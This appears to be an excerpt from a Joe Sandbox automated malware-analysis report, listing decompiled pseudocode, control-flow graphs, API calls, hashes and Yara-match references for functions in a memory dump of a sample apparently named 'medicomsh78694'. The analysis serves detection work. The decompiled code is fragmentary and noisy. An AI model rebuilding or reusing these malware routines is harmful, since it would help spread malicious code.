                                                                            • Instruction ID: 226e528ef8d89cf76aa3651449dca84ee2c763c0567bc665b78f2505a73a72ae
                                                                            • Opcode Fuzzy Hash: 9486f5e49d764a92f151d77217a9e0cba6cb209ca71685294e9262afbb7a2405
                                                                            • Instruction Fuzzy Hash: B521F8B2D4420957CB15E6649E42AFF73AC9B50304F04057FE989A2181FA39AB498BA7
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004188C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 13 4188c0-4188f1 call 4191f0 RtlAllocateHeap
                                                                            C-Code - Quality: 100%
                                                                            			E004188C0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E004191F0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413546
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}





                                                                            0x004188d7
                                                                            0x004188e2
                                                                            0x004188ed
                                                                            0x004188f1

                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(F5A,?,00413CBF,00413CBF,?,00413546,?,?,?,?,?,00000000,00408B23,?), ref: 004188ED
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_medicomsh78694.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID: F5A
                                                                            • API String ID: 1279760036-683449296
                                                                            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                            • Instruction ID: c53d960059fd60d51188ffd50ae561d8054dda033e2458622c390dbd27fda9b7
                                                                            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                            • Instruction Fuzzy Hash: 61E012B1200208ABDB14EF99CC85EA777ACAF88654F118559FE085B242C630F914CAB0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00407314, Relevance: 1.7, APIs: 1, Instructions: 188threadwindowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 211 407314-407316 212 4072b2-4072bc 211->212 213 407318-407378 call 41a150 call 407290 call 4199e0 211->213 215 4072c3-4072da call 413e60 212->215 216 4072be call 409b50 212->216 229 407380-4073b2 call 40d3e0 call 418790 213->229 221 4072dc-4072ee PostThreadMessageW 215->221 222 40730e-407312 215->222 216->215 224 4072f0-40730a call 4092b0 221->224 225 40730d 221->225 224->225 225->222 235 4073b4-4073bc 229->235 236 4073e7-4073ef 229->236 237 4073d6-4073e0 235->237 238 4073be-4073c5 235->238 237->229 240 4073e2-4073e5 237->240 238->237 239 4073c7-4073ce 238->239 239->237 241 4073d0-4073d4 239->241 242 40740d-40741f call 418720 240->242 241->237 243 4073f0-40740a call 41a0d0 241->243 242->236 248 407421-40748c call 417fa0 242->248 243->242 248->236 251 407492-4074ee call 417fe0 248->251 251->236 254 4074f4-407541 call 419680 call 4196a0 call 41a3c0 call 41a0d0 call 413a60 251->254
                                                                            C-Code - Quality: 74%
                                                                            			E00407314(void* __eax, void* __ebx, intOrPtr _a8, int _a12, char* _a16) {
				intOrPtr _v0;
				char* _v8;
				char* _v12;
				char* _v132;
				char* _v136;
				char _v656;
				char* _v668;
				char _v688;
				char* _v692;
				intOrPtr __edi;
				int __esi;
				void* __ebp;
				void* _t62;
				int _t63;
				void* _t67;
				void* _t68;
				long _t71;
				void* _t73;
				int _t74;
				void* _t76;

				asm("sahf");
				_t67 = __ebx - 1;
				_t82 = _t67;
				if(_t67 == 0) {
					 *((intOrPtr*)(_t67 + 0x558d0875)) =  *((intOrPtr*)(_t67 + 0x558d0875)) + _t68;
					asm("rcl byte [edx-0x7d], 0xc6");
					asm("sbb al, 0x56"); // executed
					_t62 = E00409B50(_t82); // executed
					_t63 = E00413E60(_t73, _t62, 0, 0, 0xc4e7b6d6);
					_t74 = _t63;
					if(_t74 != 0) {
						_t71 = _a12;
						_t63 = PostThreadMessageW(_t71, 0x111, 0, 0); // executed
						_t84 = _t63;
						if(_t63 == 0) {
							_t63 =  *_t74(_t71, 0x8003, _t76 + (E004092B0(_t84, 1, 8) & 0x000000ff) - 0x40, _t63);
						}
					}
					return _t63;
				} else {
					__edx = 0xcc7c7158;
					__eflags = __al;
					_push(__ebp);
					_push(__ebp);
					__ebp = __esp;
					__esp = __esp - 0x2ac;
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					__eax = 0;
					_v12 = 0;
					_v692 = 0;
					 &_v688 = E0041A150( &_v688, 0, 0x2a4);
					__esi = _a12;
					__ecx =  *((intOrPtr*)(__esi + 0x300));
					__edi = _v0;
					__eax = E00407290(__ebx, __eflags, _v0,  *((intOrPtr*)(__esi + 0x300))); // executed
					__eax = E004199E0(__ecx);
					_t14 =  *((intOrPtr*)(__esi + 0x2d4)) + 0x29000; // 0x29000
					__ebx = __eax + _t14;
					_a12 = 0;
					while(1) {
						__eax = E0040D3E0(__edi, 0xfe363c80); // executed
						__ecx =  *((intOrPtr*)(__esi + 0x2f4));
						__eax =  &_v688;
						__eax = E00418790(__edi,  *((intOrPtr*)(__esi + 0x2f4)), __ebx,  &_v688, 0x2a8, 0); // executed
						 *((intOrPtr*)(__esi + 0x2dc)) = __eax;
						__eflags = __eax;
						if(__eax < 0) {
							break;
						}
						__eflags = _v656;
						if(_v656 == 0) {
							L13:
							__eax = _a16;
							__eax = _a16 + 1;
							_a16 = __eax;
							__eflags = __eax - 2;
							if(__eax < 2) {
								continue;
							} else {
								__ebx = _v8;
								goto L17;
							}
						} else {
							__eflags = _v668;
							if(_v668 == 0) {
								goto L13;
							} else {
								__eflags = _v136;
								if(_v136 == 0) {
									goto L13;
								} else {
									__eflags = _v132;
									if(_v132 != 0) {
										__eax = _a12;
										__edx =  &_v688;
										__ebx = 1;
										__eax = E0041A0D0(_a12,  &_v688, 0x2a8);
										L17:
										__ecx =  *((intOrPtr*)(__esi + 0x2f4));
										__eax = E00418720(__edi,  *((intOrPtr*)(__esi + 0x2f4))); // executed
										__eflags = __ebx;
										if(__ebx == 0) {
											break;
										} else {
											__edx = _v668;
											__eax = _a12;
											__ecx = _v136;
											 *((intOrPtr*)(_a12 + 0x14)) = _v668;
											__edx =  *((intOrPtr*)(__esi + 0x2d0));
											_t34 = __esi + 0x2e8; // 0x2e8
											__eax = _t34;
											 *_t34 = _v136;
											__eax = _a12;
											_t36 = __esi + 0x314; // 0x314
											__ebx = _t36;
											__ecx = 0;
											__eax = _a12 + 0x220;
											 *__ebx = 0x18;
											 *((intOrPtr*)(__esi + 0x318)) = 0;
											 *((intOrPtr*)(__esi + 0x320)) = 0;
											 *((intOrPtr*)(__esi + 0x31c)) = 0;
											 *((intOrPtr*)(__esi + 0x324)) = 0;
											 *((intOrPtr*)(__esi + 0x328)) = 0;
											__eax = E00417FA0(__edi, _a12 + 0x220,  *((intOrPtr*)(__esi + 0x2d0)), __ebx, _a12 + 0x220);
											__ecx = 0;
											 *((intOrPtr*)(__esi + 0x2dc)) = __eax;
											__eflags = __eax;
											if(__eax < 0) {
												break;
											} else {
												__edx = _v132;
												_t44 = __esi + 0x2e0; // 0x2e0
												__eax = _t44;
												 *((intOrPtr*)(__esi + 0x318)) = 0;
												 *((intOrPtr*)(__esi + 0x320)) = 0;
												 *((intOrPtr*)(__esi + 0x31c)) = 0;
												 *((intOrPtr*)(__esi + 0x324)) = 0;
												 *((intOrPtr*)(__esi + 0x328)) = 0;
												_a12 = _a12 + 0x224;
												 *((intOrPtr*)(__esi + 0x2e4)) = _v132;
												 *__ebx = 0x18;
												 *((intOrPtr*)(__esi + 0x2d0)) = 0x1a;
												__eax = E00417FE0(__edi, _a12 + 0x224, 0x1a, __ebx, _t44);
												 *((intOrPtr*)(__esi + 0x2dc)) = __eax;
												__eflags = __eax;
												if(__eax < 0) {
													break;
												} else {
													__edx = _a8;
													 *((intOrPtr*)(__edx + 0x10)) =  *((intOrPtr*)(__edx + 0x10)) + 0x200;
													__eflags =  *((intOrPtr*)(__edx + 0x10)) + 0x200;
													__eax = E00419680(__ecx);
													__ebx = __eax;
													__eax =  *((intOrPtr*)(__ebx + 0x28));
													__eax = E0041A3C0( *((intOrPtr*)(__ebx + 0x28)));
													__edx =  *((intOrPtr*)(__ebx + 0x28));
													_t59 = __eax + 2; // 0x2
													__ecx = __eax + _t59;
													__eax =  &_v656;
													__eax = E00413A60(__edi,  &_v656, 2, 0); // executed
													_pop(__edi);
													_pop(__esi);
													_pop(__ebx);
													__esp = __ebp;
													_pop(__ebp);
													return __eax;
												}
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						goto L21;
					}
					_pop(__edi);
					_pop(__esi);
					__eax = 0;
					__eflags = 0;
					_pop(__ebx);
					__esp = __ebp;
					_pop(__ebp);
					return 0;
				}
				L21:
			}























                                                                            0x00407314
                                                                            0x00407315
                                                                            0x00407315
                                                                            0x00407316
                                                                            0x004072b2
                                                                            0x004072b8
                                                                            0x004072bc
                                                                            0x004072be
                                                                            0x004072ce
                                                                            0x004072d3
                                                                            0x004072da
                                                                            0x004072dd
                                                                            0x004072ea
                                                                            0x004072ec
                                                                            0x004072ee
                                                                            0x0040730b
                                                                            0x0040730b
                                                                            0x0040730d
                                                                            0x00407312
                                                                            0x00407318
                                                                            0x00407318
                                                                            0x0040731d
                                                                            0x0040731f
                                                                            0x00407320
                                                                            0x00407321
                                                                            0x00407323
                                                                            0x00407329
                                                                            0x0040732a
                                                                            0x0040732b
                                                                            0x0040732c
                                                                            0x00407334
                                                                            0x00407337
                                                                            0x00407344
                                                                            0x00407349
                                                                            0x0040734c
                                                                            0x00407352
                                                                            0x00407357
                                                                            0x0040735f
                                                                            0x0040736a
                                                                            0x0040736a
                                                                            0x00407371
                                                                            0x00407380
                                                                            0x00407386
                                                                            0x0040738b
                                                                            0x00407398
                                                                            0x004073a2
                                                                            0x004073aa
                                                                            0x004073b0
                                                                            0x004073b2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004073b4
                                                                            0x004073bc
                                                                            0x004073d6
                                                                            0x004073d6
                                                                            0x004073d9
                                                                            0x004073da
                                                                            0x004073dd
                                                                            0x004073e0
                                                                            0x00000000
                                                                            0x004073e2
                                                                            0x004073e2
                                                                            0x00000000
                                                                            0x004073e2
                                                                            0x004073be
                                                                            0x004073be
                                                                            0x004073c5
                                                                            0x00000000
                                                                            0x004073c7
                                                                            0x004073c7
                                                                            0x004073ce
                                                                            0x00000000
                                                                            0x004073d0
                                                                            0x004073d0
                                                                            0x004073d4
                                                                            0x004073f0
                                                                            0x004073f8
                                                                            0x00407400
                                                                            0x00407405
                                                                            0x0040740d
                                                                            0x0040740d
                                                                            0x00407415
                                                                            0x0040741d
                                                                            0x0040741f
                                                                            0x00000000
                                                                            0x00407421
                                                                            0x00407421
                                                                            0x00407427
                                                                            0x0040742a
                                                                            0x00407430
                                                                            0x00407433
                                                                            0x00407439
                                                                            0x00407439
                                                                            0x00407440
                                                                            0x00407442
                                                                            0x00407445
                                                                            0x00407445
                                                                            0x0040744c
                                                                            0x0040744f
                                                                            0x00407456
                                                                            0x0040745c
                                                                            0x00407462
                                                                            0x00407468
                                                                            0x0040746e
                                                                            0x00407474
                                                                            0x0040747a
                                                                            0x0040747f
                                                                            0x00407484
                                                                            0x0040748a
                                                                            0x0040748c
                                                                            0x00000000
                                                                            0x00407492
                                                                            0x00407492
                                                                            0x00407495
                                                                            0x00407495
                                                                            0x0040749c
                                                                            0x004074a2
                                                                            0x004074a8
                                                                            0x004074ae
                                                                            0x004074b4
                                                                            0x004074c0
                                                                            0x004074c8
                                                                            0x004074ce
                                                                            0x004074d4
                                                                            0x004074de
                                                                            0x004074e6
                                                                            0x004074ec
                                                                            0x004074ee
                                                                            0x00000000
                                                                            0x004074f4
                                                                            0x004074f4
                                                                            0x004074fa
                                                                            0x004074fa
                                                                            0x00407500
                                                                            0x0040750d
                                                                            0x0040750f
                                                                            0x00407513
                                                                            0x00407518
                                                                            0x0040751b
                                                                            0x0040751b
                                                                            0x0040752b
                                                                            0x00407533
                                                                            0x0040753b
                                                                            0x0040753c
                                                                            0x0040753d
                                                                            0x0040753e
                                                                            0x00407540
                                                                            0x00407541
                                                                            0x00407541
                                                                            0x004074ee
                                                                            0x0040748c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004073d4
                                                                            0x004073ce
                                                                            0x004073c5
                                                                            0x00000000
                                                                            0x004073bc
                                                                            0x004073e7
                                                                            0x004073e8
                                                                            0x004073e9
                                                                            0x004073e9
                                                                            0x004073eb
                                                                            0x004073ec
                                                                            0x004073ee
                                                                            0x004073ef
                                                                            0x004073ef
                                                                            0x00000000

                                                                            APIs
                                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_medicomsh78694.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessagePostThread
                                                                            • String ID:
                                                                            • API String ID: 1836367815-0
                                                                            • Opcode ID: 4ddd6b318c0bd1f39a1f9fbaaf789a033ab5648c751740f0424a0ed5e71306ef
                                                                            • Instruction ID: dd127602d5652c05562bc5ead02e76761b3753d5f3819ca0677f952c70f24e55
                                                                            • Opcode Fuzzy Hash: 4ddd6b318c0bd1f39a1f9fbaaf789a033ab5648c751740f0424a0ed5e71306ef
                                                                            • Instruction Fuzzy Hash: 8561C470A04309AFE725DF65DC85BEB77A8AB44304F10046EF949A7281DB74B941CBAA
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00407290, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 265 407290-4072da call 41a150 call 41ad30 call 409b50 call 413e60 274 4072dc-4072ee PostThreadMessageW 265->274 275 40730e-407312 265->275 276 4072f0-40730a call 4092b0 274->276 277 40730d 274->277 276->277 277->275
                                                                            C-Code - Quality: 56%
                                                                            			E00407290(void* __ebx, void* __eflags, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				char* _t18;
				long _t21;
				void* _t23;
				intOrPtr* _t24;
				void* _t25;
				void* _t29;

				_t29 = __eflags;
				_v68 = 0;
				E0041A150( &_v67, 0, 0x3f);
				_t18 =  &_v68;
				E0041AD30(_t18, 3);
				 *((intOrPtr*)(__ebx + 0x558d0875)) =  *((intOrPtr*)(__ebx + 0x558d0875)) + _t18;
				asm("rcl byte [edx-0x7d], 0xc6");
				asm("sbb al, 0x56"); // executed
				_t12 = E00409B50(_t29); // executed
				_t13 = E00413E60(_t23, _t12, 0, 0, 0xc4e7b6d6);
				_t24 = _t13;
				if(_t24 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t31 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t24(_t21, 0x8003, _t25 + (E004092B0(_t31, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}














                                                                            0x00407290
                                                                            0x0040729f
                                                                            0x004072a3
                                                                            0x004072a8
                                                                            0x004072ae
                                                                            0x004072b2
                                                                            0x004072b8
                                                                            0x004072bc
                                                                            0x004072be
                                                                            0x004072ce
                                                                            0x004072d3
                                                                            0x004072da
                                                                            0x004072dd
                                                                            0x004072ea
                                                                            0x004072ec
                                                                            0x004072ee
                                                                            0x0040730b
                                                                            0x0040730b
                                                                            0x00000000
                                                                            0x0040730d
                                                                            0x00407312

                                                                            APIs
                                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_medicomsh78694.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessagePostThread
                                                                            • String ID:
                                                                            • API String ID: 1836367815-0
                                                                            • Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                                                            • Instruction ID: ba3d5bcfed237746ec30380b6ed14dc4a9f69b7da918f5ae44e724b0e7605d49
                                                                            • Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                                                            • Instruction Fuzzy Hash: 9C01A771A8032876E721B6959C03FFF776C5B00B55F04011AFF04BA2C2E6A8790687FA
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00418A52, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 312 418a52-418a7a call 4191f0 315 418a7f-418a94 LookupPrivilegeValueW 312->315
                                                                            C-Code - Quality: 37%
                                                                            			E00418A52(void* __ecx, void* __edx, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				WCHAR* _t10;
				int _t13;
				void* _t21;

				asm("les eax, [ebp-0x38fdee29]");
				asm("in al, 0xaa");
				asm("movsb");
				asm("adc [ebp-0x75], dl");
				_t10 = _a8;
				E004191F0(_t21, _t10, _t10 + 0xc8c,  *((intOrPtr*)(_t10 + 0xa18)), 0, 0x46);
				_t13 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t13;
			}






                                                                            0x00418a52
                                                                            0x00418a59
                                                                            0x00418a5b
                                                                            0x00418a5f
                                                                            0x00418a63
                                                                            0x00418a7a
                                                                            0x00418a90
                                                                            0x00418a94

                                                                            APIs
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_medicomsh78694.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LookupPrivilegeValue
                                                                            • String ID:
                                                                            • API String ID: 3899507212-0
                                                                            • Opcode ID: 4809ff46df57bfde1b8a99110cce348b1890b07e9134698f2249d542c0401ed7
                                                                            • Instruction ID: 75f637a98093c9d51762d85ebfb074ceceb1ca9e6372dc950932d0e901eb17cd
                                                                            • Opcode Fuzzy Hash: 4809ff46df57bfde1b8a99110cce348b1890b07e9134698f2249d542c0401ed7
                                                                            • Instruction Fuzzy Hash: AAF0A0B1600248BFDB10DF55DC84EDB3BA8EF89214F148159FD09A7242C635E805CBB0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004188F4, Relevance: 1.5, APIs: 1, Instructions: 27memoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 316 4188f4-418917 call 4191f0 318 41891c-418931 RtlFreeHeap 316->318
                                                                            C-Code - Quality: 82%
                                                                            			E004188F4(void* __edx, signed int __edi, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t12;
				signed int _t19;

				_t19 = __edi >> 1;
				asm("adc esp, [edx-0x1374aa2b]");
				_t9 = _a4;
				_t3 = _t9 + 0xc74; // 0xc74
				E004191F0(_t19, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t12 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t12;
			}





                                                                            0x004188f6
                                                                            0x004188fd
                                                                            0x00418903
                                                                            0x0041890f
                                                                            0x00418917
                                                                            0x0041892d
                                                                            0x00418931

                                                                            APIs
                                                                            • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_medicomsh78694.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeHeap
                                                                            • String ID:
                                                                            • API String ID: 3298025750-0
                                                                            • Opcode ID: f19674379307aef602e1fa7fc40e611f37f987ab2a5b2df20b2fd9eebc02f8ce
                                                                            • Instruction ID: 7e7d1fc913a5f18de5c1a52c619892727b87da8f20aa61674cc2ff5b96c978a7
                                                                            • Opcode Fuzzy Hash: f19674379307aef602e1fa7fc40e611f37f987ab2a5b2df20b2fd9eebc02f8ce
                                                                            • Instruction Fuzzy Hash: EFE06DB5200645AFD718DF55CC48EE77769EF88310F058689FD185B382D630E914CBB0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00418A06, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 46%
                                                                            			E00418A06(void* __eax, void* __edx, signed int __edi) {
				void* __ebp;
				int _t12;
				void* _t19;
				void* _t23;

				asm("aas");
				asm("out 0x6e, al");
				_t19 = __edx + 0xf + __edi * 2;
				asm("salc");
				E004191F0(_t19, __eax, __eax + 0xc8c,  *((intOrPtr*)(__eax + 0xa18)), 0, 0x46);
				_t12 = LookupPrivilegeValueW( *(_t23 + 0xc),  *(_t23 + 0x10),  *(_t23 + 0x14)); // executed
				return _t12;
			}







                                                                            0x00418a06
                                                                            0x00418a07
                                                                            0x00418a09
                                                                            0x00418a0d
                                                                            0x00418a7a
                                                                            0x00418a90
                                                                            0x00418a94

                                                                            APIs
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_medicomsh78694.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LookupPrivilegeValue
                                                                            • String ID:
                                                                            • API String ID: 3899507212-0
                                                                            • Opcode ID: 17cc0dc12bbd5f79c87b69c925ace9ec072e3141f1a7758fecbbd1aec24c85a3
                                                                            • Instruction ID: 66f20162e5ce426f211fae6e64c1f5e530a5f456470759eb6e3002097dd00ffb
                                                                            • Opcode Fuzzy Hash: 17cc0dc12bbd5f79c87b69c925ace9ec072e3141f1a7758fecbbd1aec24c85a3
                                                                            • Instruction Fuzzy Hash: D1E092B22002046FD610EF44CC84EE73359EF84350F118555F90C2B642CA35A955CBF5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00418900, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00418900(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E004191F0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                            0x0041890f
                                                                            0x00418917
                                                                            0x0041892d
                                                                            0x00418931

                                                                            APIs
                                                                            • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_medicomsh78694.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeHeap
                                                                            • String ID:
                                                                            • API String ID: 3298025750-0
                                                                            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                            • Instruction ID: 5f54135a6d5665afae9514b011c4f342711cdf5a633985feeb8d835705c457f1
                                                                            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                            • Instruction Fuzzy Hash: 98E012B1200208ABDB18EF99CC89EA777ACAF88750F018559FE085B242C630E914CAB0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00418A60, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00418A60(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				intOrPtr _t7;
				int _t10;
				void* _t15;

				_t7 = _a4;
				E004191F0(_t15, _t7, _t7 + 0xc8c,  *((intOrPtr*)(_t7 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}






                                                                            0x00418a63
                                                                            0x00418a7a
                                                                            0x00418a90
                                                                            0x00418a94

                                                                            APIs
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_medicomsh78694.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LookupPrivilegeValue
                                                                            • String ID:
                                                                            • API String ID: 3899507212-0
                                                                            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                            • Instruction ID: b5f2a6165515d53f35f5e56a9475d77ccb8deec25097a7d382054e427d326996
                                                                            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                            • Instruction Fuzzy Hash: 93E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FE0857242C934E8548BF5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00418940, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00418940(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E004191F0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                                            0x00418943
                                                                            0x0041895a
                                                                            0x00418968

                                                                            APIs
                                                                            • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418968
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_medicomsh78694.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExitProcess
                                                                            • String ID:
                                                                            • API String ID: 621844428-0
                                                                            • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                            • Instruction ID: 1333b191b135ec901ac61a9cb59cf638980f097d56b5f16c626c7f81ecdb5f9b
                                                                            • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                            • Instruction Fuzzy Hash: 52D012716002187BD620DF99CC85FD7779CDF48750F018065BA1C5B242C531BA00C6E1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00418934, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 37%
                                                                            			E00418934(intOrPtr _a4, int _a8) {
				signed char _t9;
				void* _t21;
				signed char _t23;

				asm("pushfd");
				_t23 = _t9 ^ 0x00000065;
				asm("out 0xb0, eax");
				asm("aam 0xde");
				_t12 = _a4;
				_push(_t23);
				E004191F0(_t21, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t12 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}






                                                                            0x00418934
                                                                            0x00418939
                                                                            0x0041893a
                                                                            0x0041893c
                                                                            0x00418943
                                                                            0x0041894c
                                                                            0x0041895a
                                                                            0x00418968

                                                                            APIs
                                                                            • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418968
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_medicomsh78694.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExitProcess
                                                                            • String ID:
                                                                            • API String ID: 621844428-0
